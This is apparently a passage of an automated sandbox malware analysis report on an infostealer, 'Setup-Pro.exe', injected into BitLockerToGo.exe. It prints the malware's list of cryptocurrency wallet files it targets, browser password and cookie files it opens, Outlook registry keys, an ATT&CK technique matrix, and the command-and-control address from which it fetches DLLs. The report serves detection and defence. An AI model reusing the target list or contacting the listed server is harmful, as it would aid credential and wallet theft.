                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\window-state.json*
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\window-state.json*
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.wallet
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-walJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shmJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-walJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7772, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 2.2.BitLockerToGo.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.Setup-Pro.exe.2ab8000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.27aa000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.27aa000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.27f8000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.27f8000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.2ab8000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup-Pro.exe.2ab8000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.BitLockerToGo.exe.3000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.Setup-Pro.exe.2ab8000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1585102260.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1507758122.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1585102260.00000000027F6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1585102260.00000000027A8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1586077537.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7772, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7772, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    Boot or Logon Initialization Scripts411
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol4
                    Data from Local System
                    2
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                    Obfuscated Files or Information
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Screen Capture
                    2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    DLL Side-Loading
                    NTDS144
                    System Information Discovery
                    Distributed Component Object Model1
                    Email Collection
                    112
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Masquerading
                    LSA Secrets21
                    Security Software Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items411
                    Process Injection
                    DCSync12
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    System Owner/User Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    C:\ProgramData\freebl3.dll0%ReversingLabs
                    C:\ProgramData\mozglue.dll0%ReversingLabs
                    C:\ProgramData\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\nss3.dll0%ReversingLabs
                    C:\ProgramData\softokn3.dll0%ReversingLabs
                    C:\ProgramData\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                    https://mozilla.org0/0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                    https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u0%URL Reputationsafe
                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg0%URL Reputationsafe
                    https://support.mozilla.org0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://45.66.249.162/9e6547173a597645.phptrue
                      unknown
                      http://45.66.249.162/55145c8889ec57f2/sqlite3.dlltrue
                        unknown
                        http://45.66.249.162/55145c8889ec57f2/softokn3.dlltrue
                          unknown
                          http://45.66.249.162/55145c8889ec57f2/vcruntime140.dlltrue
                            unknown
                            http://45.66.249.162/true
                              unknown
                              http://45.66.249.162/55145c8889ec57f2/nss3.dlltrue
                                unknown
                                http://45.66.249.162/55145c8889ec57f2/mozglue.dlltrue
                                  unknown
                                  http://45.66.249.162/55145c8889ec57f2/msvcp140.dlltrue
                                    unknown
                                    http://45.66.249.162/55145c8889ec57f2/freebl3.dlltrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drfalse
                                      • URL Reputation: safe
                                      unknown
